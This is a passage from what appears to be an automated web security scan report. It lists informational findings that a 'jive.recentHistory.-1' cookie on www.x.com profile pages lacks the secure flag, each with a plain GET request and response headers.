Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.191. https://www.x.com/people/Saleem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333437343b332c3133373131353b332c3133363935343b332c35333735313b332c36303039313b332c323030383b332c3133383538323b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.192. https://www.x.com/people/Shade8934

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133373131353b332c3133363935343b332c3133383538323b332c35333735313b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.193. https://www.x.com/people/Suneetha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.194. https://www.x.com/people/admin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.195. https://www.x.com/people/amypiazza00

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.196. https://www.x.com/people/angelleye

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.197. https://www.x.com/people/billday

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.198. https://www.x.com/people/blingnation2010

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.199. https://www.x.com/people/bryngregory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.200. https://www.x.com/people/das_licht

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.201. https://www.x.com/people/dchankhour

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.202. https://www.x.com/people/eferreira

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.203. https://www.x.com/people/encore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.205. https://www.x.com/people/gazugafan

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.206. https://www.x.com/people/gem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.207. https://www.x.com/people/gogoeric

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.208. https://www.x.com/people/hotellina

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.209. https://www.x.com/people/iConcessionStand

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.210. https://www.x.com/people/joncas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.211. https://www.x.com/people/lwhite2104

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.212. https://www.x.com/people/mandeheritage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.213. https://www.x.com/people/odeskdev

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.214. https://www.x.com/people/omuleanu

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
